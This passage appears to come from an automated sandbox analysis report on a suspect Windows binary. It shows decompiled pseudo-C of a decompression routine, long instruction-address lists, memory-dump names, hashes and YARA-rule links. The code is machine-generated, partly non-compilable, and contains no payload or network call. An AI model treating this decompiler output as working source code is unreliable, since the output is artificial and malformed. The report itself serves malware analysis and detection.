											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040681A( &(__esi[3]), __edi, 0x101, 0x407388, 0x4073c8, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040681A(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x407408, 0x407444, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406043
0x00406043
0x00406043
0x00406043
0x00406043
0x00406047
0x00000000
0x00000000
0x0040604d
0x0040604d
0x00406050
0x00406053
0x00406058
0x0040605a
0x0040605d
0x00406060
0x00406063
0x00406063
0x00406066
0x00000000
0x00000000
0x00406068
0x00406068
0x0040606b
0x00406070
0x00406072
0x00406075
0x0040607b
0x00405dda
0x00405dda
0x00405ddd
0x00405de3
0x00405de9
0x00405df2
0x00405df8
0x00405dfb
0x00405e02
0x00405e07
0x00405e0d
0x00405e18
0x00405e18
0x00406081
0x00406081
0x0040608b
0x00000000
0x00000000
0x00406091
0x00406091
0x00406095
0x00406098
0x00406098
0x0040609c
0x004060a2
0x004060a2
0x004060a5
0x004060a8
0x004060ae
0x00000000
0x00000000
0x004060b0
0x004060d2
0x004060d2
0x004060d5
0x00000000
0x00000000
0x004060b2
0x004060b6
0x00000000
0x00000000
0x004060bc
0x004060bc
0x004060bf
0x004060c2
0x004060c7
0x004060c9
0x004060cc
0x004060cf
0x004060cf
0x004060d7
0x004060d7
0x004060dd
0x004060e0
0x004060e3
0x004060e3
0x004060ea
0x004060ee
0x004060f2
0x004060f5
0x004060f8
0x004060fe
0x00406103
0x00000000
0x00000000
0x00406105
0x00406119
0x00406119
0x0040611d
0x00000000
0x00000000
0x00406107
0x0040610a
0x0040610a
0x00406111
0x00406116
0x00406116
0x00406116
0x0040611f
0x0040611f
0x00406122
0x00406130
0x00406136
0x0040613b
0x00406141
0x00406147
0x0040614d
0x00406154
0x00406168
0x00406168
0x00406737
0x00406737
0x00406737
0x0040673c
0x00000000
0x00000000
0x00405d74
0x00405d74
0x00000000
0x0040636f
0x0040636f
0x00406373
0x00406376
0x00406379
0x0040637c
0x00000000
0x00000000
0x00406382
0x00406382
0x004063a7
0x004063a7
0x004063a7
0x004063a9
0x00000000
0x00000000
0x00406387
0x00406387
0x0040638b
0x00000000
0x00000000
0x00406391
0x00406391
0x00406394
0x00406397
0x0040639a
0x0040639c
0x0040639e
0x004063a1
0x004063a4
0x004063a4
0x004063a4
0x004063ab
0x004063ab
0x004063b3
0x004063b6
0x004063b9
0x004063bc
0x004063c0
0x004063c3
0x004063c5
0x004063c8
0x004063ca
0x004063de
0x004063de
0x004063e1
0x004063fb
0x004063fb
0x004063fe
0x00000000
0x00000000
0x00406404
0x00406404
0x00406407
0x00000000
0x00000000
0x0040640d
0x0040640d
0x00000000
0x0040640d
0x004063e3
0x004063e6
0x004063ed
0x004063f0
0x00000000
0x004063f0
0x004063cc
0x004063d0
0x004063d3
0x00000000
0x00000000
0x00406418
0x00406418
0x0040643d
0x0040643d
0x0040643d
0x0040643f
0x00000000
0x00000000
0x0040641d
0x0040641d
0x00406421
0x00000000
0x00000000
0x00406427
0x00406427
0x0040642a
0x0040642d
0x00406430
0x00406432
0x00406434
0x00406437
0x0040643a
0x0040643a
0x0040643a
0x00406441
0x00406449
0x0040644c
0x0040644f
0x00406451
0x00406454
0x00406454
0x00406456
0x0040645a
0x0040645d
0x00406460
0x00406463
0x00000000
0x00000000
0x00406469
0x00406469
0x0040648e
0x0040648e
0x0040648e
0x00406490
0x00000000
0x00000000
0x0040646e
0x0040646e
0x00406472
0x00000000
0x00000000
0x00406478
0x00406478
0x0040647b
0x0040647e
0x00406481
0x00406483
0x00406485
0x00406488
0x0040648b
0x0040648b
0x0040648b
0x00406492
0x00406492
0x0040649a
0x0040649d
0x004064a0
0x004064a3
0x004064a7
0x004064aa
0x004064ac
0x004064af
0x004064b2
0x004064cc
0x004064cc
0x004064cf
0x00000000
0x00000000
0x004064d5
0x004064d5
0x004064d8
0x004064df
0x00000000
0x004064df
0x004064b4
0x004064b7
0x004064be
0x004064c1
0x00000000
0x00000000
0x004064e7
0x004064e7
0x0040650c
0x0040650c
0x0040650c
0x0040650e
0x00000000
0x00000000
0x004064ec
0x004064ec
0x004064f0
0x00000000
0x00000000
0x004064f6
0x004064f6
0x004064f9
0x004064fc
0x004064ff
0x00406501
0x00406503
0x00406506
0x00406509
0x00406509
0x00406509
0x00406510
0x00406518
0x0040651b
0x0040651e
0x00406520
0x00406523
0x00406523
0x00406525
0x00000000
0x00000000
0x0040652b
0x0040652b
0x0040652e
0x00406533
0x00406535
0x0040653b
0x0040653d
0x00406552
0x00406554
0x00406554
0x0040653f
0x00406545
0x00406547
0x00406549
0x00406549
0x00406556
0x0040655a
0x0040655d
0x00406563
0x00406563
0x00406566
0x00406566
0x00406566
0x00406568
0x00000000
0x00000000
0x0040656e
0x0040656e
0x00406574
0x00406576
0x0040659b
0x0040659e
0x004065a4
0x004065a9
0x004065af
0x004065b5
0x004065b7
0x004065ba
0x004065c3
0x004065c9
0x004065c9
0x004065bc
0x004065be
0x004065c0
0x004065c0
0x004065cb
0x004065d1
0x004065d3
0x004065d6
0x004065d8
0x004065de
0x004065e0
0x004065e2
0x004065e4
0x004065e6
0x004065e9
0x004065f2
0x004065f5
0x004065f5
0x004065eb
0x004065eb
0x004065ee
0x004065ee
0x004065e9
0x004065e0
0x004065f7
0x004065f9
0x00000000
0x00000000
0x00000000
0x00000000
0x004065f9
0x00406578
0x00406578
0x0040657e
0x00406584
0x00406586
0x00000000
0x00000000
0x00406588
0x00406588
0x0040658a
0x0040658c
0x00406595
0x00406595
0x0040658e
0x0040658e
0x00406591
0x00406591
0x00406597
0x00406599
0x00000000
0x00000000
0x004065ff
0x004065ff
0x00406604
0x00406606
0x00406607
0x00406608
0x00406609
0x0040660f
0x00406612
0x00406615
0x00406618
0x0040661a
0x00406620
0x00406620
0x00406623
0x00406623
0x00406623
0x00406623
0x0040662c
0x00000000
0x00000000
0x00406631
0x00406631
0x00406634
0x00406637
0x00406639
0x004066d0
0x004066d0
0x004066d3
0x004066d5
0x004066d6
0x004066d7
0x004066da
0x00000000
0x004066da
0x0040663f
0x0040663f
0x00406645
0x00406647
0x0040666c
0x0040666f
0x00406675
0x0040667a
0x00406680
0x00406686
0x00406688
0x0040668b
0x00406694
0x0040669a
0x0040669a
0x0040668d
0x0040668f
0x00406691
0x00406691
0x0040669c
0x004066a2
0x004066a4
0x004066a7
0x004066a9
0x004066af
0x004066b1
0x004066b3
0x004066b5
0x004066b7
0x004066ba
0x004066c3
0x004066c6
0x004066c6
0x004066bc
0x004066bc
0x004066bf
0x004066bf
0x004066ba
0x004066b1
0x004066c8
0x004066ca
0x00000000
0x00000000
0x00000000
0x00000000
0x004066ca
0x00406649
0x00406649
0x0040664f
0x00406655
0x00406657
0x00000000
0x00000000
0x00406659
0x00406659
0x0040665b
0x0040665d
0x00406664
0x00406664
0x00406666
0x0040665f
0x0040665f
0x00406661
0x00406661
0x00406668
0x0040666a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004066e2
0x004066e2
0x004066e5
0x004066e7
0x004066ea
0x004066ed
0x004066ed
0x004066ed
0x004066ed
0x00000000
0x00000000
0x00000000
0x00405d9b
0x00405d7f
0x00000000
0x00405d85
0x00405d88
0x00405d92
0x00405d95
0x00405d98
0x00000000
0x00405d98
0x00405d7f
0x00405da3
0x00405da6
0x00405daa
0x00405db4
0x00405dbe
0x00405dc1
0x00405dc7
0x00405efb
0x00405efd
0x00405f03
0x00405f06
0x00405f09
0x00000000
0x00405f09
0x00405dcd
0x00405dcd
0x00405dce
0x00405e26
0x00405e26
0x00405e2d
0x00405ed3
0x00405ed3
0x00405ed8
0x00405edb
0x00405ee0
0x00405ee3
0x00405ee8
0x00405eeb
0x00405ef0
0x00405ef3
0x00405ef3
0x00000000
0x00405e33
0x00405e33
0x00405e33
0x00405e33
0x00405e37
0x00405e37
0x00405e59
0x00405e5c
0x00405e5e
0x00405e61
0x00405e66
0x00405e3c
0x00405e3c
0x00405e41
0x00405e43
0x00405e45
0x00405e4a
0x00405e50
0x00405e55
0x00405e57
0x00405e57
0x00405e4c
0x00405e4c
0x00405e4c
0x00405e4a
0x00000000
0x00405e68
0x00405e95
0x00405e9a
0x00405e9c
0x00405e9d
0x00405e9f
0x00405ea0
0x00405ea0
0x00405ea0
0x00405ec8
0x00405ecd
0x00405ecd
0x00000000
0x00405ecd
0x00405e66
0x00405e2d
0x00405dd0
0x00405dd0
0x00405dd1
0x00405e1b
0x00000000
0x00405e1b
0x00405dd3
0x00405dd4
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f30
0x00405f30
0x00405f30
0x00405f33
0x00000000
0x00000000
0x00405f10
0x00405f10
0x00405f14
0x00000000
0x00000000
0x00405f1a
0x00405f1a
0x00405f1d
0x00405f20
0x00405f25
0x00405f27
0x00405f2a
0x00405f2d
0x00405f2d
0x00405f2d
0x00405f35
0x00405f35
0x00405f38
0x00405f3a
0x00405f3f
0x00405f42
0x00405f44
0x00405f47
0x00000000
0x00000000
0x00405f4d
0x00405f4d
0x00405f4f
0x00000000
0x00000000
0x00405f55
0x00405f55
0x00405f59
0x00000000
0x00000000
0x00405f5f
0x00405f5f
0x00405f62
0x00405f64
0x00406002
0x00406002
0x00406005
0x00406007
0x00406007
0x0040600a
0x0040600d
0x0040600f
0x00406011
0x00406013
0x00406013
0x0040601c
0x00406021
0x00406024
0x00406027
0x0040602a
0x0040602d
0x0040602d
0x0040602d
0x00406030
0x00406036
0x00406036
0x0040603c
0x0040603c
0x0040603c
0x00000000
0x00406030
0x00405f6a
0x00405f6a
0x00405f70
0x00405f73
0x00405f75
0x00405fa0
0x00405fa3
0x00405fa9
0x00405fae
0x00405fb4
0x00405fba
0x00405fbc
0x00405fbf
0x00405fc8
0x00405fce
0x00405fce
0x00405fc1
0x00405fc3
0x00405fc5
0x00405fc5
0x00405fd0
0x00405fd6
0x00405fd9
0x00405fdb
0x00405fdd
0x00405fe3
0x00405fe5
0x00405fe7
0x00405fea
0x00405ff3
0x00405ff3
0x00405ff5
0x00405fec
0x00405fec
0x00405fef
0x00405fef
0x00405ff7
0x00405ff7
0x00405fe5
0x00405ffa
0x00405ffc
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ffc
0x00405f77
0x00405f77
0x00405f7d
0x00405f83
0x00405f85
0x00000000
0x00000000
0x00405f87
0x00405f87
0x00405f89
0x00405f8b
0x00405f8e
0x00405f95
0x00405f95
0x00405f97
0x00405f90
0x00405f90
0x00405f92
0x00405f92
0x00405f99
0x00405f9b
0x00405f9e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004060a2
0x004060a5
0x004060a8
0x004060ae
0x00000000
0x00000000
0x00000000
0x00000000
0x00406285
0x00406285
0x00406285
0x00406288
0x0040628b
0x0040628d
0x00406290
0x00406296
0x0040629d
0x0040629f
0x00000000
0x00000000
0x00406173
0x00406173
0x0040619b
0x0040619b
0x0040619b
0x0040619d
0x00000000
0x00000000
0x0040617b
0x0040617b
0x0040617f
0x00000000
0x00000000
0x00406185
0x00406185
0x00406188
0x0040618b
0x0040618e
0x00406190
0x00406192
0x00406195
0x00406198
0x00406198
0x00406198
0x0040619f
0x0040619f
0x004061a7
0x004061aa
0x004061b0
0x004061b3
0x004061b7
0x004061bb
0x004061be
0x004061c1
0x004061d9
0x004061d9
0x004061dc
0x004061ea
0x004061ed
0x004061de
0x004061de
0x004061e0
0x004061e7
0x004061e7
0x00406216
0x00406216
0x00406216
0x00406219
0x0040621b
0x00000000
0x00000000
0x004061f6
0x004061f6
0x004061fa
0x00000000
0x00000000
0x00406200
0x00406200
0x00406203
0x00406206
0x00406209
0x0040620b
0x0040620d
0x00406210
0x00406213
0x00406213
0x00406213
0x0040621d
0x0040621d
0x0040621f
0x00406221
0x0040622c
0x0040622f
0x00406232
0x00406234
0x00406236
0x00406238
0x0040623b
0x0040623e
0x00406243
0x00406246
0x00406249
0x0040624c
0x00406253
0x00406256
0x00406258
0x00000000
0x00000000
0x0040625e
0x0040625e
0x00406262
0x00406273
0x00406273
0x00406273
0x00406275
0x00406275
0x00406279
0x00406279
0x00406279
0x0040627b
0x0040627c
0x0040627f
0x0040627f
0x0040627f
0x00406282
0x00000000
0x00406282
0x00406264
0x00406264
0x00406267
0x00000000
0x00000000
0x0040626d
0x0040626d
0x00000000
0x0040626d
0x004061c3
0x004061c3
0x004061c5
0x004061c7
0x004061ca
0x004061cd
0x004061d1
0x004061d1
0x004062a5
0x004062a5
0x004062a8
0x004062af
0x004062b3
0x004062b5
0x004062b8
0x004062bb
0x004062c0
0x004062c3
0x004062c5
0x004062c6
0x004062c9
0x004062d4
0x004062d7
0x004062ee
0x004062f3
0x004062fa
0x004062ff
0x00406303
0x00406305
0x00406305
0x00406305
0x00406308
0x0040630a
0x00000000
0x00406310
0x00406310
0x00406314
0x0040631f
0x00406332
0x00406337
0x0040633c
0x0040633e
0x00000000
0x00000000
0x00406344
0x00406344
0x00406347
0x00406349
0x00406357
0x00406357
0x0040635a
0x0040635a
0x0040635d
0x00406360
0x00406363
0x00406366
0x00406369
0x0040636c
0x00000000
0x0040636c
0x0040634b
0x0040634b
0x00406351
0x00000000
0x00000000
0x00000000
0x00406351
0x00000000
0x00000000
0x00000000
0x004066f0
0x004066f0
0x004066f6
0x004066fc
0x00406701
0x00406707
0x0040670d
0x0040670f
0x00406712
0x0040671b
0x00406721
0x00406721
0x00406714
0x00406716
0x00406718
0x00406718
0x00406723
0x00406725
0x00406728
0x00406763
0x00406763
0x00000000
0x0040672a
0x0040672a
0x0040672a
0x00406730
0x00406733
0x00406735
0x0040676a
0x0040676c
0x00000000
0x0040676c
0x00000000
0x00406735
0x00000000
0x00405d74
0x00406742
0x00000000
0x00406742
0x00406156
0x00406158
0x00000000
0x00000000
0x0040615a
0x0040615a
0x0040615d
0x00000000
0x0040615d
0x004060a2
0x00406063
0x00406747
0x0040674a
0x0040674c
0x00406755
0x0040675b
0x00000000

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
Instruction ID: e2ef9aa76577a7a1e17a70bef0141433c3d77918b2314780ae2ebb94a64f5d95
Opcode Fuzzy Hash: b4b312f10185920f8a0b96b4abd929aee100b8ba7c7b52d81bf300e1eca2c2a6
Instruction Fuzzy Hash: D1E17B71900709DFDB28CF58C884BAAB7F5EB44305F15852FE896AB291D378AA51CF14

Uniqueness

Uniqueness Score: -1.00%

Function 1000CD27, Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: b1c94d1a7de5a8a9b6a80f4a3a0336f1d591be03f135de5321b8fb262f45dd19
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: DDC152322052970AEB4DC779C47493EBEE1DB926F131B076ED8B3CB5D9EE20C5649620

Uniqueness

Uniqueness Score: -1.00%

Function 1000C90F, Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.681888530.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.681879647.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681911714.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.681933338.000000001001F000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.681942281.0000000010020000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.681951290.0000000010021000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 56eba0105f7ef240fa449d18eaa978ca8592043a306515ee4523643c35df4af1
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 08C150322052970AEB4DC779C47583EBEE1DB926F131B176ED8B3CB5D8EE20D5249620

Uniqueness

Uniqueness Score: -1.00%

Function 0040681A, Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040681A(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42cdf0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42cdf0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
